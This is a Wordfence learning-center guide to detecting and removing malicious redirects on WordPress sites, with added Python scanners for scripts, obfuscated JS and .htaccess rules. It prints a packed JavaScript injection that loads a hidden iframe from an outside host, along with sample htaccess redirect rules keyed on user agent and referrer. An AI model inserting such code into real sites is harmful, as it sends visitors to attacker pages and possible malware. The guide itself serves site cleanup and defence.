Removing Malicious Redirects From Your Site
The WordPress Security Learning Center

3.1: Removing Malicious Redirects From Your Site

Advanced
Updated September 16, 2019

What is a malicious redirect?

A malicious redirect is code inserted into a website with the intent of redirecting the site visitor to another website. Malicious redirects are typically inserted into a website by attackers with the intent of generating advertising impressions. However, some malicious redirections can have more damaging effects. A malicious redirect can exploit vulnerabilities in a site visitor’s computer through web-based scripts to install malware on unprotected machines. As such, it is critical to remove malicious redirects from your site.

Determining if your site is infected

Most site owners are unaware that their site is redirecting visitors. Often, they first learn of the redirection when a customer reaches out to say they have ended up in an undesirable corner of the internet when attempting to visit the site. A site owner could even attempt to replicate the problem, only to see that everything looks fine to them on their computer, while site visitors on mobile platforms experience malicious activity. The redirect might happen on some pages and not others. Or, it might happen before the site even loads.

If Wordfence has identified your site as having one or more malicious redirects, there are some steps you can take to remove the malicious redirect and restore your site to normal functionality.

Finding and Removing Malicious Redirects

Before you make changes to your site files or database, we recommend backing up all site files in a safe place, especially if you are unfamiliar with the inner workings of your content management system (CMS).

A malicious redirect can be inserted anywhere on your site. It might be in your site files or even in your database.

Here are some of the malicious redirects often detected by our scans and some instructions on how to remove them.

Javascript insertions in your site’s files.

On WordPress sites, we see javascript entries placed in theme files. Typically we will find these within the theme’s header, often right above the tag. But they can be elsewhere in the site’s files.

A script typically found in the header can look like the following:

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript>  
A malicious script can look like a normal javascript included file.

<script src="http://www.[redacted].com/anyscript.js"></script>

A malicious script can also be included in another script.

$.getScript('http://www.[redacted].com/script.js', function()

  1. Determine which script is performing the malicious redirect. Not all javascript on your site is malicious; in fact, most of the javascript you will find on your site is part of core functionality.
  2. In Chrome, enter “view-source:” in front of the site’s URL (e.g., view-source:http://www.sitename.com) and search for “<script” within the file. You can look for what other code or text is close to the malicious script to determine which site file contains the malicious code.
  3. If it is a theme file, you can use your site’s theme editor to remove the offending javascript. Or you can download your site via FTP or your cpanel file manager and upload the cleaned file back to your server.

Javascript inserted in pages or posts.

Often, attackers will run a script that inserts javascript into all of the posts/pages on your site. These redirects will not be found in site files, but rather in the site’s database. There may be more than one script inserted. It might be on one page, or it might be on all of them. These scripts may look the same as the script above, but these redirects can often be obfuscated (intentionally obscured to make code ambiguous).

These javascript malicious redirects will look similar to the javascript examples above.

Removing this redirect: To remove this redirect, there are a few options. Often, these redirects are inserted into every post on the site. Scripts can be removed by editing:

  • within the content management system (e.g., via WordPress post editing)
  • via a database tool like phpMyAdmin, which allows for editing more than one page/post at a time.
  • via a downloaded text file locally and uploading the cleaned posts into the database using a SQL management tool. While fastest, this does require a level of technical expertise in working with SQL.
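Whether you are reading view-source output or post content exported from the database, the first job is an inventory of every script tag. The following is an added example, not Wordfence code: it lists external scripts from hosts you have not approved and every inline script, with line numbers. The host names, the allowlist and the sample markup are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptInventory(HTMLParser):
    """Collect each <script> element as (line, src or None, inline body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = [self.getpos()[0], dict(attrs).get("src"), ""]

    def handle_data(self, data):
        if self._open is not None:
            self._open[2] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(tuple(self._open))
            self._open = None

def review_scripts(html, site_host, allowed_hosts=()):
    """Return (line, kind, detail) for external scripts from hosts that are
    neither the site nor allowlisted, and for every non-empty inline script."""
    parser = ScriptInventory()
    parser.feed(html)
    parser.close()
    trusted = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for line, src, body in parser.scripts:
        if src:
            # Relative URLs have no host and belong to the site itself.
            host = (urlparse(src).hostname or site_host).lower()
            if host not in trusted:
                findings.append((line, "external", host))
        elif body.strip():
            findings.append((line, "inline", body.strip()[:40]))
    return findings

# Constructed sample of page source; all hosts are placeholders.
SAMPLE = """<head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.allowed.example/lib.js"></script>
<script src="http://www.unknown.example/anyscript.js"></script>
<script>eval(function(p,a,c,k,e,d){return p}('x',1,1,''.split('|'),0,{}))</script>
</head>"""

if __name__ == "__main__":
    print(review_scripts(SAMPLE, "www.sitename.com", ["cdn.allowed.example"]))
```

Inline scripts are always listed because many are legitimate; the output is a review list, not a verdict.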

Javascript redirects inserted into widgets.

Malicious scripts can also be inserted into widgets.

Obfuscated javascript appended to javascript files.

An attacker can add a few lines of javascript to some or all of the javascript files within the site’s files. A search of site files for the URL to which the site is redirecting might not find any results because this javascript is often obfuscated. Here is a sample:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x...

Removing this redirect: To remove this type of malicious redirect, download the entire site using an FTP program to your computer, and search for the offending javascript. If you have a development tool that allows you to scan all of the files on your site, you may find that this malicious redirect has been inserted in all of the javascript files on your site. Check for both .js and .json files, including core files, theme files, plugins, etc. Once you have cleaned all of the site files, upload the cleaned site back to the server.
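Because the redirect URL itself is hidden, searching the downloaded copy for the obfuscation instead is more reliable. The following is an added example, not Wordfence's scanner: it walks a local copy of the site and reports .js and .json files containing the packer wrapper, `_0x` identifiers or runs of `\x` escapes like the samples on this page. The marker patterns, thresholds and the demo file tree are assumptions.

```python
import os
import re
import tempfile

# Markers modelled on the samples on this page; a hit means "review", not "infected".
MARKERS = {
    "packer": re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)"),
    "hex_identifier": re.compile(r"\b_0x[0-9a-fA-F]{3,}\b"),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){3,}"),
}

def find_markers(text):
    """Map marker name -> 1-based line number of its first occurrence."""
    found = {}
    for name, rx in MARKERS.items():
        m = rx.search(text)
        if m:
            found[name] = text.count("\n", 0, m.start()) + 1
    return found

def scan_tree(root, extensions=(".js", ".json")):
    """Walk a downloaded copy of the site; return {relative path: markers}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_markers(fh.read())
            if hits:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return results

def demo():
    """Build a small constructed site tree in a temp directory and scan it."""
    clean = "function add(a, b) {\n  return a + b;\n}\n"
    appended = clean + r'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76"];' + "\n"
    files = {"clean.js": clean, "wp-content/themes/demo/app.js": appended,
             "notes.txt": appended}  # .txt is outside the scanned extensions
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "themes", "demo"))
        for rel, body in files.items():
            with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

The reported line number shows where the marker first appears, which helps separate code appended to the end of a file from a legitimately minified library.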

Redirects inserted into htaccess files.

An htaccess file is a file placed on your server that provides directives to the server before your site’s files are even accessed. For a WordPress site, for example, the htaccess file will tell the server to send requests to permalinks to the WordPress primary index.php file for handling. Other directives can be placed in an htaccess file, and it is a favorite location for attackers to place malicious redirects. Often, these types of redirects will redirect based on the type of browser or device, or by the site that referred the visitor to your site (most often, from one of the search engines). An htaccess redirect can look like this:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi

An htaccess redirect can even redirect you based on the browser (user agent) OR the referrer (what sent the visitor to your site). Here is a sample:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|ms

These redirects can be difficult to isolate and remove. Manipulating the htaccess file can cause the site to stop functioning altogether or create errors that do not make much sense, such as an internal server error. If you are unfamiliar with the directives within the htaccess file, it makes sense to get help.

Removing this redirect: Start by downloading your .htaccess file. Your cpanel file manager might not show you this “hidden” file, and sometimes downloading it to your computer’s hard drive might make it disappear even though you can see it in your FTP application. You will need to remove the redirection, leaving behind the code necessary for the operation of your site. This can be hosting provider dependent, as there are often entries within an htaccess file necessary for your site’s functionality.
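To separate the injected directives from the ones your site needs, review each RewriteRule together with the RewriteCond lines that gate it. The following is an added example, not Wordfence code: it flags rules whose target is an off-site URL and redirects that depend on the visitor's user agent or referrer, while leaving the stock WordPress block alone. The sample file, including the placeholder redirect target, is constructed.

```python
import re

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(.+?)\s*$", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[(.*)\])?\s*$", re.I)
VISITOR_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER")
# Absolute target that is not just the site's own host (e.g. an HTTPS upgrade).
OFFSITE = re.compile(r"https?://(?!%\{(?:HTTP_HOST|SERVER_NAME)\})", re.I)

def audit_htaccess(text):
    """Return RewriteRules to review: off-site targets, and redirects that
    depend on the visitor's user agent or referrer."""
    findings, conds = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            conds.append((lineno, cond.group(1).upper()))
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        target, flags = rule.group(2), rule.group(3) or ""
        visitor = [n for n, var in conds if any(v in var for v in VISITOR_VARS)]
        offsite = OFFSITE.match(target) is not None
        redirect = any(f.strip().upper().startswith("R") for f in flags.split(","))
        if offsite or (visitor and redirect):
            findings.append({"rule_line": lineno, "target": target,
                             "cond_lines": visitor, "offsite": offsite})
        conds = []  # RewriteCond lines apply only to the next RewriteRule
    return findings

# Constructed .htaccess: an injected block above the stock WordPress rules.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ http://redirect-target.example/ [R=301,L]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

if __name__ == "__main__":
    print(audit_htaccess(SAMPLE))
```

A flagged rule is a candidate for removal, not proof of compromise: hosting providers and mobile themes sometimes add legitimate user-agent redirects, so compare each finding against what your site is meant to do.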

Ad networks

Some advertising networks are lenient in their standards for the advertising they accept into their network. The site may be completely free of malware, but an advertising network may be redirecting site visitors. Determining which advertising network may be the culprit can be a very difficult task as malicious advertising redirects can be served up sporadically and unpredictably.

Removing this redirect: If your site is maliciously redirecting visitors, you have exhausted all other options, and you have advertising networks placed on your site, removing those ad networks may solve the malicious redirection problem.

Looking Beyond The Redirect

No matter what type of redirect you have found on your site, the big question is how did it get there. You likely have other types of malware or security vulnerabilities on your site that allowed an attacker to gain access to the site and place the malicious redirect. You may have backdoors, malicious file uploaders, or other problems on the site.

If after reading this guide, you are unsure of how to remove the malicious redirect or are looking for more answers as to how the code was placed on your site, get help.
